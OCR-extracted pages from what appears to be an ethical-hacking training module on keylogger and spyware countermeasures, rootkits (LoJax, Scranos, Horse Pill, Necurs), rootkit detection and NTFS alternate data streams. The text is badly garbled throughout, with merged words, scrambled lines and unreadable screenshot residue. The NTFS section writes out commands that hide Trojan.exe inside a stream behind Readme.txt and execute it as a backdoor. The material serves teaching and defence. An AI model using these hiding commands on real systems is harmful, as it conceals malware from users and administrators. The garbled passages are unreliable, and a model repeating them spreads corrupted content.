revoseaty
© checkour kb merc to ene fat no er components lige io the cableconnector
eyboan
© tat
veer etevorer detectsthepresence oa hardnreeyogsrsch
@ and
dk
on
kings
mouse
vicar onscreenteybnad
© onto
recy neck vies blestdteche resn ofhrdvaeeone
Modul
6 725
Page 1 countermensreCopyriht
©y -Comell
phishing
Recognize emailsanddeletethem,
Regularly
update
andpatch systemsoftware,
Donot clickon linksi n unsolicitedor dubiousemailsthat may directyou to malicious
sites.
Use keystroke
interferencesoftwarethat insert randomizedcharactersinto every
keystroke.
Antivirusandanti-spyware
softwarec an detect
any installed butitis betterto
software,
detecttheseprogramsbeforeinstallation.Scanthe files thoroughly
before installing
them onto the computer to check
editor or processexplorer
and use a registry for
keystroke
loggers
Usethe Windowson-screen keyboard accessibilityutilityto enter a password
or any
‘other
confidential
information.
Use your mouse to enter any informationsuchas
passwords and credit cardnumbersinto the fields, byusing your mouse insteadof
typingthe passwords with the keyboard.This will ensure that your informationis
confidential,
Use an automatic form-fillingpassword manageror a virtual keyboard to enter
usernames and passwords, as this will avoid exposurethrough keyloggers. This
automatic form-filing
password manager will remove the needto typeyour personal,
or confidential
financial, detailssuchas creditcard numbers andpasswords via the
keyboard
your hardwaresystems
Keep secure i n a lockedenvironment and frequently checkthe
keyboard cablesfor attachedconnectors,USBport,and computer gamessuchas the
PS2that may havebeenusedto installkeylogger software.
Usesoftwarethat frequentlyscan andmonitor changes or network.
i n your system
Installa host-based
IDS, anddisable
whichcan monitor your system the installation
of
keyloggers.
Use one-time password (OTP)
or otherauthenticationmechanisms suchas two-step
or
multi-step
to
verification authenticateusers.
Enableapplication whitelisting
to blockdownloadingor installing
of unwantedsoftware
suchas keyloggers.
*
UseVPNto enable
a n additional of protection
layer through
encryption.
=
Useprocess-monitoring
toolsto detectsuspicious andsystem
processes activities
Regularlypatch
andupdate
softwareandthe OS.
HardwareKeylogger
Countermeasures
‘=
access
sensitive
computer
Restrict physical to
systems.
Periodicallycheckyour keyboardinterfaceto ensure that no extra components
are
plugged
into the keyboard
cableconnector.
ical andCountermensores
Mackin ©by E-Comel
Copyright
betweenthe keyboard
Useencryption andits driver.
Use an anti-keylogger
that detectsthe presenceof a hardwarekeylogger
suchas
KeyGrabber.
Usean on-screen keyboard
andclickon it usinga mouse.
Periodically
checkthe video monitor cablesto detect the presenceof hardware
keyloggers.
Set up videosurveillance deskto detectplugging
aroundthe computer i n of malicious
hardware.
DisableUSBportsor set up advancedBIOSauthenticationmechanisms
to enableUSB
ports.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Anti-Keyloggers
keysrambier
Anti-Keyloggers
Anti-keyloggers, also called anti-keystroke loggers,detect and disable keystroke logger
software. Thespecial designoftheseloggers helps themto detectsoftwarekeyloggers. Many
largeorganizations, financialinstitutions,online gamingindustries, and individualsuse anti-
keyloggers to protecttheir privacywhile usingsystems. This software preventsa keylogger
fromlogging everykeystroke typed bythe victim,andthuskeeps all personal informationsafe
and secure. An anti-keylogger scans a computer and detectsand removes keystroke logger
software.If the software (anti-keylogger) finds any keystroke-logging programon your
computer, it immediately identifiesand removes the keylogger, whether it is legitimate or
illegitimate,
Someanti-keyloggers detectthe presence of hiddenkeyloggers bycomparing all files i n the
computeragainst a signature database of keyloggers and searching for similarities.Others
detectthe presenceof hidden keyloggers byprotecting keyboard driversand kernelsfrom
manipulation. A virtual keyboard or touchscreen makesthe task of keystroke-capturing of
maliciousspywareor Trojan programsdifficult. Anti-keyloggers secure your systemfrom
spywareandkeyloggers.
=
ZemanaAntiLogger
Source:https://www.zemana.com
ZemanaAntiLogger is a softwareapplication that blocksattackers.It detectsany
attempts to modify
your computer's recordyour activities,hook to your PC's
settings,
or injectmaliciouscode into your system.
sensitive processes, TheAntiLogger detects
the malwareat the time it attacksyour system, ratherthan detectingit basedon its
fingerprint.
signature
ical andCountermensores
Mackin ©by E-Comel
Copyright
* —
Admareas2/Bdbteur
98671060
6115:ScreenshotofZemana
Figure AntiLoger
Someexamples
ofanti-keyloggers
are listedasfollows:
+
GuardediD(https://www.strikeforcecpg.com)
=
(https://www.qfxsoftware.com)
KeyScrambler
+
Oxynger (httpsi//aww.oxynger.com)
KeyShield
Ghostpress
(https://schiffer.tech)
SpyShelter
FreeAnti-Keylogger
(https://www.spyshelter.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
Spyware
How to Defendagainst
Spyware
Spyware systemwithout their knowledge.
is any maliciousprogram installedon a user’s It
gathersconfidentialinformation suchas personaldataandaccesslogs.
Spyware can originate
from three basicsources: free downloadedsoftware, email attachments,
and websitesthat
automatically
installspywarewhenyou
Different
waysto defend
browse
them,
spywareare asfollows:
against
Tryto avoidusinganycomputer system that you do not havea complete
controlover.
Neveradjust your Internet securitysetting level too low because
it provides many
chancesfor spywareto be installedon your computer. always
Therefore, set your
Internetbrowsersecuritysettingsto either highor mediumto protectyour computer
fromspyware.
Do not opensuspicious emailsand file attachmentsreceivedfromunknownsenders.
Thereis a highlikelihoodthat you will allow a virus, freeware,
or spyware onto the
computer. Do not open unknown websites linkedi n spammailmessages,
retrieved by
searchengines, or displayed i n pop-up windowsbecause theymay misleadyou into
downloading spyware.
Enablea firewallto enhancethe security levelofyourcomputer.
Regularly
updatethe software,
checkTaskManager
Regularly
a
anduse firewallwith outboundprotection.
andMSConfiguration Manager reports.
Regularly
update
virus definitionfilesandscan the systemfor spyware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
software.
Installanti-spyware Anti-spyware is thefirstline of defenseagainst
spyware.
Thissoftwarepreventsspyware from installing
on your system. It periodically
scans and
protectsyoursystemfromspyware.
Keep yourOSup to date.
© Windowsusers shouldperiodically
perform or Microsoftupdate.
a Windows
>
refer
For users of otherOSsor softwareproducts,to the informationgivenbythe OS
andtakeessentialstepsagainstanyvulnerability
vendors, identified.
Performweb surfing
safely
anddownloadcautiously.
Beforedownloading
any software, ensure that it is from a trustedwebsite.Readthe
licenseagreement,
security warning,and privacystatements associated with the
softwarethoroughly
to gain a clearunderstanding beforedownloading it.
Beforedownloadingfreewareor sharewarefrom a website, ensure that the site is
be cautious with softwareprogramsobtained through
safe. Likewise, P2Pfile-
swappingsoftware.Beforeinstallingsuchprograms,perform a scan usinganti
spywaresoftware.
not
Do use administrativemodeunlessit is necessary,
becauseit mayexecute malicious
programssuchas spyware i n administratormode.Consequently, attackersmaytake
complete
Donot
control
of
your system.
downloadfree musicfiles,screensavers,or emoticons fromthe Internetbecause
whenyoudo,thereis a possibilitythat are downloadingspywarealong with them.
Bewareof pop-upwindowsor web pages.Neverclickanywhere on the windowsthat
display
messages suchas “your
computer or claimthat they
maybe infected,― can help
your computerto run faster.If you clickon suchwindows, your system may become
infectedwith spyware.
Carefully including
readall disclosures, the licenseagreement
and privacy statement,
any
beforeinstalling application
Do not store personal
or financialinformationon any computer
systemthat is not
totally
underyourcontrolsuchasin an Internetcafé
ical andCountermensores
Mackin ©by E-Comel
Copyright
Anti-Spyware
surenant aspen tena 2019
Securty
Secretnyher
ae internat ecu
Anti-Spyware
applications
Thereare many anti-spyware availableon the market,whichscan your system and
checkfor spywaresuchas malware, Trojans,dialers,worms, keyloggers,androotkitsand
remove themif found.Anti-spyware
provides
real-timeprotection byscanningyour systemat
regular eitherweekly
intervals, or daily.
It scans to ensure that the computeris freefrom
malicioussoftware,
=
SUPERAntiSpyware
Source:https://www.superantispyware.com
is a softwareapplication
SUPERAntiSpyware that can detectandremove spyware,
adware,
Trojan
horses, software,
rogue security computer worms, rootkits,parasites,
andotherpotentially applications.
harmfulsoftware
ical andCountermensores
Mackin ©by E-Comel
Copyright
Quceatinacentas
oeaSelec
e
“icaveaanavocing Seta
shel
med
reed
tom
our {[2items
compute
CriteatThreats
Theses Found)
( |
CL)Unwanted
esters
ar
ten
aware
oar
nts
unten
These
toms
are
net[items
nas Found}
Programs/Settings
Figure6.126:
Screenshot
of SUPERAnESpyware
Someexamples
of anti-spyware are listedas follows:
programs
Kaspersky
Internet Security2019 (https://support.kaspersky.com)
=
SecureAnywhere Complete
InternetSecurity (https://www.webroot.com)
=
adawareantivirus free(hetps://www.adaware.com)
MacScan(https://www.securemac.com)
Norton AntiVirus Plus(https://us.norton.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Rootkits
that hidetheirpresencea s well
Rootkits are programs attackersmalcous actives, granting
ther ul access
totheserver orost a that time,andthe fture
Roots
replace
In certain
operating
her of
undermine
tur,
systemc al andlites with own modified
thesecur ofthetargetsystemcausingmalcousfunctions
vrsons those routines that,
to beexecuted
of
backdoor
programs, bots,
|Atylcalroot comprises nies, log-wipng
DDoSprograms,packet tities,RC et.
HidingFiles
After a n attackerhasperformed maliciousoperations (i.e.,executedmaliciousapplications)on.
a targetsystemto gain escalated privileges,he/she embedsandhideshis/hermalicious
programs. Theattackerc an do thisusingrootkits,NTFSstream, andSteganography techniques,
etc. to preventthe maliciousprogramfrom protective applicationssuch as antivirus,anti
malware, andanti-spyware applications
installedon the targetsystem. Sucha hiddenmalicious
the victim’s
malicious
to
file allowsthe attacker maintain theirdirectaccess to the system,
various techniques
consent. Thissection describes
files.
even i n the future,
without
usedbyattackersto hidetheir
Rootkits
Rootkitsare softwareprograms designed to gain access to a computer without being detected.
Theyare malwarethat helpattackersgain unauthorized
access to a remote systemand
perform maliciousactivities. Thegoalof 2 rootkit is to gain root privileges to a system. By
logging i n as the root user of a system,
softwareor deleting
applications.
an attackercan perform
files. It works by exploiting
It buildsa backdoorlogin
various
tasks
suchas installing
the vulnerabilitiesin the OS and its
processi n the OSvia whichthe attacker can evade the
standardlogin process.
Oncethe user enablesroot access,a rootkit may attemptto hidethe traces of unauthorized
accessbymodifying driversor kernelmodules anddiscarding active processes.Rootkits replace
certain OScallsandutilitieswith their own modifiedversions of thoseroutines that,i n turn,
undermine thesecurityof thetargetsystembyexecuting malicious functions.A typical rootkit
comprises backdoorprograms,DDoSprograms,packet sniffers, log-wipingutilities,IRCbots,
andothers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Allfilescontain a set of attributes.Thereare differentfieldsin thefileattributes.Thefirstfield
determinesthe formatof the file if it is a hidden, archive, or read-only file. Theother field
describes the time of the file creation, access, and its original length. The functions
GetFileAttributesExA()
and GetFileinformationByHandle()
are usedfor the aforementioned
purposes.ATTRIB.exe displays or changes the file attributes.An attackercan hide or even
changethe attributesof a victim’s
filesso that theattackercan access them,
Theattackerplaces
a rootkit by
‘=
computers
Scanning
Wrapping servers
forvulnerable and on the web
iton special
=
package
therootkit i n a likea game
'=
through
social
Installing public corporate
or computers engineering
=
Objectives
a attack
(privilege
Launching
zero-day
Windows
of a rootkit:
etc.) escalation, kernelexploitation,
=
Torootthe hostsystem
andgainremote backdoor
access
=
=
mask presence
To
To gather
ofmalicious
applications
attackertracksand
sensitive data,networktraffic,
or processes
forwhichattackersmight
etc. fromthe system
berestricted or have no access
To store othermalicious
programso n the system
andact as a server resource forbot
updates
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Rootkits
Types
Kernel
Level
Hardware/Firmware
HypervisorLevel
©
and
of hardware
tht
Aetsasahnpersor
code
ae ‘device
driver
Hdesin devicesor © Ai matcous or replaces
and
to
‘modifies
theBoots equence platform
firmware the ori OSkernal
{he computersystemfod hot nepetedor coe coder
vital
machine
hostoperating
‘he system
a 8 tea
of Rootkits
‘Types
A rootkit is a typeof malwarethat can hideitselffromthe OSand antivirus applications
on a
computer. Thisprogramprovides theattackers through
withroot-levelaccessto thecomputer
backdoors,
rootkit influences a
Theserootkitsemployrangeof techniques
thechoiceof attackvectors.
to gaincontrol system.
of
a
Thetypeof
the system's
host
the
all hardwarecalls
boot
so
Hardware/Firmware
of
sequencethat itisloaded instead the original
Rootkit: Hardware/firmware
virtual machine
monitor.
rootkits use devicesor platform
firmwareto create a persistent malwareimagei n hardware, suchas a hard drive,
systemBIOS,
it for codeintegrity.
of rootkitmalware
the use of creatinga permanent do
or networkcard.Therootkithidesin firmwareas the users not inspect
A firmwarerootkit implies delusion
ical andCountermensores
Mackin ©by E-Comel
Copyright
Boot-Loader-Level rootkits(bootkits)
Rootkit:Boot-loader-level functioneither by
modifyingthe legitimate boot loaderor replacing it with anotherone. Thebootkit can
activate even beforethe OSstarts. Therefore, bootkitsare serious threatsto security
becausetheyfacilitatethe hacking of encryption keys andpasswords.
Application-Level/User-Mode Rootkit: An application-level/user-mode rootkit runs i n
Ring-3
as a user along with other applicationsin the system. It exploits
the standard
behaviorof APIs.It operatesinsidethe victim’s computer byreplacing the standard
applicationfiles(application binaries)with rootkitsor bymodifying the behavior of
presentapplicationswith patches, injectedmalicious code, ete.
Library-Level Rootkits:Library-level
rootkits work high up i n the OS,and theyusually
patch,
hook,or supplant systemcallswith backdoorversions to keepthe attacker
unknown.They replace the originalsystem callswith fake ones to hide information
abouttheattacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
a
How Rootkit Works
wes ar Hoke)
re eres)
DiracKernel
Object
Manipulation
(OÂ¥ON)
xON root
by
hideproces uninkngo m thepacer
et
How a Rootkit Works
System hooking is the process of changing and replacing the originalfunction pointerwith a
pointerprovided
a rootkit changes
nitdll.dil),placing
some of the bytes Inline
bytherootkiti n stealthmode. functionhooking
of a functioninsidethe core system
an instruction so thatanyprocess
is a technique
i n which
DLLs(kernel32.dll
callshit therootkitfrst.
and
DirectKernelObject
“Manipulation
(OKOM)
Figure6.117:
Workinof rootkit
Directkernelobjectmanipulation (DKOM) rootkitscan locateand manipulatethe “system―
processi n kernel memorystructures and patchit. Thiscan alsohide processes
and ports,
change privileges, and misguide the Windowsevent viewer without any problem by
ical andCountermensores
Mackin ©by E-Comel
Copyright
manipulating the list of active processes
of the OS,thereby datainsidethe process
altering
identifierstructures. It can obtain read/write
access to the \Device\Physical
Memory object.It
a
hides processbyunlinking
process
lst.
it fromthe
ical andCountermensores
Mackin ©by E-Comel
Copyright
Rootkits:LoJax
Popular and Scranos CEH
Lojax Seranos
executed
whenever
expos UEFthat
starts
thesystem up mechanism, andmains command
Popular
Rootkits: Horse Pill and Necurs
HorsePal Necurs
Popular
Rootkits
Theare
some
of popular
following
=
rootkits
Lolax
the most
Source:https://www.welivesecurity.com
typeof UEFIrootkitthat is widely
Lolax is a usedbyattackersto perform
cyber-attacks.
Lolax is createdto injectmalwareinto the systemand is automatically
executed
ical andCountermensores
Mackin ©by E-Comel
Copyright
whenever starts up. It exploits
the system whichacts as an interface
UEFI, betweenthe
OSandthe firmware.It is extremely
challenging
to detectLolaxas it evadestraditional
controls
security andmaintains its persistence
even afterOSreinstallationor harddisk
replacement.
Lolax uses a collectionof tools to access and modify
the system’s
UEFI/BIOS
settings.
The
©
functions
performed
Collect
save
all settings
and
file
bythesetoolsincludethe following:
the system in a text
© Accessthe contents of the system’s
SerialPeripheral Interface(SPI)
memory that
a
contains UEFI/BIOS locationandsave it as a firmware
Embeda maliciousUEFImodule(rootkit)
image
into the firmwareimageandthensave the
firmwareimagei n the SPIflashmemory
83d06944
cddeBde
EStlStaokios
soy
eve
wee
C7é2
DSBS
bIbS
b5bS
6.118:
Figure
toe
Secoensho.t
ofLolox
eee
6.119:Secoenshot2
Figure ofLolo
Scranos
Source:https://www.bitdefender.com
Scranosis a trojanized rootkit that masquerades as crackedsoftwareor a legitimate
suchas anti-malware,
application, a videoplayer,or an ebook reader, to infectsystems
and perform data exfiltrationthat damages the reputation of the targetand steals
intellectualproperty.When thisrootkitexecuted, a rootkit driveris automatically
installed,
whichthen starts installingothermalicious components into the system. Apart
frominstallingmalicious components, Scranosalsointeracts with various websites on
Theoperations
of
the behalf the victim,
performed
bythe Scranos
dropper
androotkit are as follows:
The dropper stealscritical informationsuch as logincredentials,
cookies,
and
paymentinformationusingspecialized DLLsandsendsbackthedata to a command
andcontrol(C&C)server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
installsa rootkitinto thesystem,
Thedropper
Therootkit registers a shutdowncallbackto achievepersistence. At shutdown,
the
driveris written to disk, service key
and a start-up is createdi n the registry.
Therootkitinjects
a downloader
into an svchost.exe
process.
‘The
downloadersendssome informationaboutthe system
to the C&Candreceives
download
links.
Payloadsare downloaded
andexecuted automatically,
6.121:
Figure Sezeenshot2ofSeranos
6
Module 742
Page
and ©ical Mackin Countermensores
Copyright
by E-Comel
HorsePill
Source:http://www.pill.horse
a proof
HorsePill is of concept of a ramdisk-based containerizing rootkit. It resides
inside“initrd,―
andbeforetheactualinit starts running,it putsit into a mount andPID
namespacethat allowsit to run covert processesand storage.Thisalsoallowsit to run
covert networking
systems, suchas DNStunnels,
rootegtf
Figure 6.123:
Sereenshot2
ofHorse
Pllootkit
It hasthreeimportant
movingparts,whichare as follows
©. klibe-horsepill.patch.
Thisis a patch to klibethat provides whichon modernUbuntusystems
run-init, runs
the real init, systemd. This patches in the rootkitfunctionality
and creates a
maliciousrun-init. Thisbinary hasa new section calledthe DNSCMDLINE, which
provides command-line optionsto dnscatbundledwithinthe patch.
horsepill_setopt
This scripttakes i n command-linearguments
and puts them into the section
mentioned
above.
horsepill_infect
Thistakesthe file to splatover run-init while assembling
ramdisksa s a command-
line argument. It then callsupdate-initramfs and splats
over the run-init as the
ramdisksare being assembled.
6
Module 742
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Necurs
Source:httpsi//www.f-secure.com
Necursis a kernel-modedrivercomponent that can beusedbyan attacker(oraddedas
a component to anothermalicious program)to performunauthorizedactions to take
controlof an OS, without alerting
the system’s mechanisms.
security Necurscontains
backdoorfunctionality,whichallows remote access andcontrolof the infected
computer. and filtering
It alsoallowsthe monitoring of networkactivityand hasbeen
observedto sendspam and install rogue security software.It enablesfurther
byproviding
compromise the functionality
to do the following
9
0
Download
additional
malware
Hideapplicationsfunctioning
its components
©. Stopsecurity from
DUORD
DUORD Key
DUORDKey:
DUORDCndBut for
Figure6.124
Sereenshotd
ofNecursroctit
eax, [ebpeCrdBuFFerLength]
eax 3 OUT_BufLen
obs, [enprenamuereey,
eax OUT_ouF
3
9CAIELO8H 3 Skey2
OnFER9910N 3 Skeyt
biecurs_CrdSearcha
6
Module 744
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
A
CT
/ts/Nost.
WypertertTransferProtocol
post asp HTTP/A;2\P\N
TO
don
Fengths190)
Sereenshot3
Figure 6.126: ofNecurs
rootkit
Someexamples
ofpopular
rootkitsare listedas follows:
=
Azazel
+
Sirefet
=
Wingbird
Rootkit
Avatar
GrayFish
ZeroAccess
Module
6 745
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Rootkits
Detecting
runtime oeciton
istecniquecompores pth of and erecta
alate processes es befor ond
Rootkits
Detecting
We haveseen howattackersemploy various rootkitsto hidefilesandtheir presence on the
targetsystem. Now, let us discussvarious rootkit detectionmethodsfrom a security
In general,
perspective. rootkit detectiontechniques can be categorized
into signature-based,
integrity-based,
heuristic-based, andruntimeexecution path
cross-view-based, profiling,
‘=
Integrity-Based
Detection
Integrity-based
detectioncan be regarded
as a substitutefor both signature-based
and
detection.Initially,
heuristic-based the user runs toolssuchas Tripware and AIDEon a
cleansystem. Thesetools create a baselineof cleansystemfilesand store them in a
database.Integrity-based
detectionfunctionsbycomparinga current filesystem, boot
records,or memorysnapshot with that trustedbaseline. They detectthe evidenceor
presenceof malicious
activitybasedon dissimilaritiesbetweenthe current andbaseline
snapshots.
Signature-Based
Detection
Signature-based
detectionmethodswork as rootkit fingerprints.
Theycompare the
characteristics
of all systemprocesses
andexecutable
fileswith a database
of known
rootkit fingerprints. It can comparea sequence of bytesfrom a file with another
sequence of bytes that belong program.Themethodmostly
to a malicious scanssystem
files.It can easilydetectinvisiblerootkitsbyscanningthe kernelmemory.Thesuccessof
signature-based tendency
detectionis lower owing to the rootkit’s to hide files by
interrupting the execution pathof the detectionsoftware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Heuristic/Behavior-Based
Detection
Heuristic-baseddetectionworks byidentifying deviationsin normalOSpatternsor
behaviors.This typeof detection is also known as behavioraldetection.Heuristic
detectioncan identify
new, previouslyunidentifiedrootkitsbyrecognizingdeviantsin
“normal―
systempatterns Executionpath
or behaviors. hooking is one suchdeviantthat
helpsheuristic-based rootkits
detectorsidentify
RuntimeExecutionPathProfiling
The runtime execution pathprofiling technique comparesruntime execution path
profiling
ofall systemprocesses andexecutable files.Therootkit addsa new codenear
execution pathto destabilizeit. Themethodhooksseveralinstructions
to a routine’s
executed beforeandaftera certain routine,as thesecan besignificantlydifferent,
Cross-View-Based Detection
Cross-view-based detectiontechniques functionbyassumingthat the OShasbeen, in a
way, subverted. Thistechnique enumerates the systemfiles,processes, and registry
keysbycalling c ommon APIs.The tools comparethe gathered informationwith the
datasetobtainedusingan algorithm to traversethrough
the same data.This detection
technique relieson the fact that the API hookingor manipulation of the kerneldata
structure causes the data returned bythe OS APls to be tainted with low-level
mechanisms used to output the same information free from DKOMor hook
manipulation,
Alternative
TrustedMedium
The alternativetrusted mediumtechnique
is the most reliable methodused for
detecting
rootkitsat the OSlevel.In this technique,
the infectedsystem
is shutdown
andthen bootedfromalternativetrustedmedia, suchas a bootableCD-ROMor USB
flashdrive.After booting,
the OSstorage is checked to find traces of the rootkit,
which
can furtherberemoved, to restore the system to its normal state.
Analyzing Memory Dumps
In memory dumpanalysis, the volatile memory (RAM) of the suspected systemis
dumped andanalyzed to detecttherootkiti n the system.
Using thistechnique, one can
create a static snapshot of a singleprocess,systemkernel, or the entire system. To
detect a rootkit,the entire system memoryis dumped to analyze and captureactive
rootkits.Thismemorydumpcan further be usedto perform offline forensicanalysis.
Creating memorydumps mayrequire specialized hardware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
for Detecting
Steps Rootkits
Run "diz
Infected
/2 /b /ah*and "dix /s /b /a-b" side
5 andsave theresus te potently
Step
‘Run
nts version
lerhiingghostware
(i.e, of
of WinMerge
to
invisible
inside,
wise
from
ouside)
on thetw sate results detect
6 but the
for Detecting
Steps Rootkits
Thereare many tools availableon the marketthat can be usedto detectthe presence of
rootkitson a targetsystem. However,sometimes, toolsare inadequate as themalware writers
always find waysto counter theseautomatedrootkit detectors,andsome of theirlatestefforts
are even ableto evadethem. Therefore, it is better to manually detecta rootkit.Manual
Manually
of
detection rootkitsrequirestime, patience,
examine the filesystem
perseverance, expertise.
andregistry
of the system
and
to detectrootkits.
Steps to detectrootkitsbyexamining
the filesystem
are as follows.
drive,
and asave
Boot into cleanCD,
run "dix /s
theobtainedresults.
/b /ah―
and"dir /s /b /a-h" onthe same
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
Rootkits
CEH
mages, peasant
‘eet
egy
vert
von
rotrmsety toptem
ta
h eree ening
Farin cmos
opty
update
tru an antsy
‘cae not
downlod
oy
om ergs
How to Defendagainst
Rootkits
A common featureof theserootkitsis that the attackerrequires administratoraccess to the
targetsystem. Theinitialattackthatleadsto thisaccessis oftennoisy.Therefore, one should
monitor the excess networktrafficthat arises i n the faceof a new exploit. It is obviousthat log
analysisis a n importantcomponent of riskmanagement. The attacker may haveshellscripts or
toolsthat can helphim/her cover his/her tracks, but therewill almostcertainly beothertelltale
signs
A
that can leadto proactivecountermeasures, not justthe reactive ones.
data,excluding
reactive countermeasure is to backup allcritical the binaries,and performa
violationswhenchanges
a
fresh,cleaninstallationfrom trusted source. Onecan perform
defenseagainsttools like rootkits.MDSsum.execan fingerprint
occur. Todefendagainst rootkits,
codechecksumming
filesand note integrity
integritycheckingprogramsshould
as
agood
beusedfor criticalsystem files.
Afewtechniques
=
adopted
to defend
against
ReinstallOS/applications
rootkitsare as follows.
froma trustedsource after backingup criticaldata
+
automatedinstallationprocedures
Maintainwell-documented
Perform analysis
kernelmemory dump to determinethe presenceof rootkits
‘=
=
the server
against
attack
Harden workstation or the
anyfiles/programs
Educatestaffnot to download fromuntrustedsources
firewallsandfrequently
Installnetwork-andhost-based checkfor updates
Ensurethe availability
of trustedrestoration media
andpatch
Update applications,
OSs, andfirmware
Module
6 750
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Regularly
verifythe integrityof systemfiles using cryptographically
strongdigital
fingerprint
technologies
Regularly
updateantivirus andanti-spyware
software
Keep anti-malwaresignaturesup to date
Avoid logging privileges
into an account with administrative
to the leastprivilege
‘Adhere principle
Ensurethatthe chosenantivirus softwarepossessesrootkit protection
Do not installunnecessary applications,anddisable thefeatures andservices not i n use
Refrain fromengagingin dangerous activities on the Internet
Closeanyunusedports
Periodically
scan the localsystem using host-based security scanners
ical andCountermensores
Mackin ©by E-Comel
Copyright
Anti-Rootkits
awarebtes
An Rete
Anti-Rootkits
Thefollowinganti-rootkitscan be usedto remove various typesof malware,
suchas rootkits,
Trojans,
viruses, and worms, fromthe system. You can downloador purchaseanti-rootkit
from malware,
softwarefromtheir websitesand installthem on your PCto gain protection
especially
fromrootkits.
=
GMER
Source:http://www.gmer.net
GMERis an application
that helps professionals
security to detectand remove rootkits
byscanningprocesses,threads,modules,services, files,disksectors (MBR), ADSs,
keys,
registry driverhookingSSDT,
~
IDT,andIRPcalls,andinlinehooks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
A fewmore
Figure6.127:
Screenshot
ofantiraotkt
anti-rootkitsare listedas follows.
important
G
Stinger(https://www.mcafee.com)
Avast FreeAntivirus (https://www.avast.com)
(https://usa.kaspersky.com)
TDsSkiller
MalwarebytesAnti-Rootkit(https://www.malwarebytes.com)
RootkitBuster(http://www.trendmicro.co.in)
Module
6 752
Page tical MakingandCountermensores
by Comet
Copyright©
NTFSData Stream
ie le,
[NFSAlternateDatastream can forkdatainto
‘ApS AS allowsan atacer to
(05) 3 Windows
hidden iting files ith Injectmalicious
codei n
forthe sucha¢
‘metadata functionality a ndexecutethem
detected
se, or system
Sttnbtes,wordcount,author delayofl browsing withoutBeing by
‘madieation
tine ofthe
l es
NTFSDataStream
NTFSis a filesystem that stores a file with the helpof two data streams,
calledNTFSdata
streams,along withthefileattributes. Thefirstdatastreamstoresthesecurity descriptorfor
thefile to be stored,
suchas permissions, andthesecondstores thedatawithin a file.ADSsa re
another typeof nameddatastreamthat can bepresent eachfile.
within
=<
oo
theirphysical
to anytypeof dataattached
locations on thedisk.Therefore,
aof
to file,but not in the fileon an NTFS
ADSs
system.
in thefilebutattached
a re not present
The
master file tableof the partitioncontains a list all the data streams that a file contains and
to it
through the file table. NTFSADSis a Windowshiddenstream that contains metadatafor the
file,suchas attributes, wordcount,authorname, and accessand modification times of the
ical andCountermensores
Mackin ©by E-Comel
Copyright
ADSsc an forkdata into existingfileswithoutchanging or alteringtheirfunctionality,size, or
displayto file-browsing
utilities.Theyallowan attackerto injectmaliciouscodeinto fileson an
accessible systemand execute them withoutbeingdetectedbythe user. ADSsprovide
attackerswith a methodof hiding rootkitsor hackertools on a breachedsystem andallow a
Userto execute themwhilehiding fromthesystem
administrator,
Wacker
command
=
EM
cotchemuningse
suchas the
file,thesize of.
The onlyindicationthat the file was changed
whichcan be innocuous.
is the
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to CreateNTFSStreams
is stream compliant
Notepad application
launch: \pnatepadmyfite.txt:1on. txt
View
fies#529.
tx er)
the of my shouldbe
or
Toview
the
motte steamdts hidden
notepadayite.ext:eiger. Oe
instep 1 nue following resect
commands
How to CreateNTFSStreams
Using NTFS datastreams,an attackerc an almostcompletely hidefileswithin a system.
Itis easy
to use thestreams,butthe user can only identify
it withspecific software. Explorer
can display
onlythe root files;it cannot view the streamslinkedto the root filesandcannot definethe disk
security by As implants
itself
spaceused the streams. such,if a virus
softwarewill identify i.
into ADS, itis unlikely
thatstandard
some
data,
enter
LaunchSave
the
¢:\>notepad
and file
myfile. txt: tiger. txt to create the new file,
andclick‘Yes’
some
data,
enter
Save
the zero}
myfite..
and
Viewthe filesize of
file
txt (Itshouldbe
Thefollowing
commands
can beusedto view or modify
stream datahiddeni n steps1
and2,respectively:
notepadmyfile. txt: Lion. txt
notepadmyfile. txt: tiger. txt
Note: Notepad stream-compliant
is a application.
You shouldnot use alternatestreamsto store
criticalinformation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
NTFSStreamManipulation
‘inn
nee) esa 0)
Tocreate linktotheTrojan.exe
stream
insidetheReadme.fle
NTFSStreamManipulation
Youcan manipulate
NTFSstreams to hide a maliciousfile i n other files,suchas text files,by
doing
the following:
Hiding Trojan.exe (malicious
program) in Readme.txt (stream):
Usethe following commandto move the contents Trojan.exe
c:\>type c:\Trojan.exe>c:\Readme.
of
txt: Trojan.exe
(stream):
to Readme.txt
The“type―
commandhidesa file in an alternatedata stream (ADS) behindan existing
file.Thecolon(:)
operator
givesthe command
of
to create or use ADS.
stovethecontents
Location, to Readme.txt
Trojan.exe
q Location
Tojan.exe
(size:
2MB) Readme.tt (size:
0)
ical andCountermensores
Mackin ©by E-Comel
Copyright
theTrojan:
Executing
C:
Type \>backdoorto run the Trojan
the backdoor
is theshortcut
the Trojan.
Here,
that you havehiddenbehindReadme.txt.
createdi n the previous step,which on execution installs
Note: UseNotepad
to readthe hiddenfile.
For example,the command C:\>notepad
sample.
txt:secret.txt creates the secret.txt
stream behindthe sample.tat
file
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defendagainst
NTFSStreams
filestotheFATparton
move thesuspected
T odeleteNIFSstreams,
Usethird-partyfl inter
checker
suchas to FileIntegrity
Tripwire theinterty
Managermaintain
such
Useprograms
ADS
ae SteamDetector,LADS,
or Detectorto detect
streams
[Enable
real-time
antivirusseaning theexecution of maicous
to protetagainst streams i n yoursstem
Use
uptodate
antivius
on software yoursytem
*
Todeletehidden
partition NTFS streams,m ove the suspected
filesto
a file allocationtable (FAT)
Use a third-party
file integritychecker
suchas Tripwire
File Integrity
Manager
to
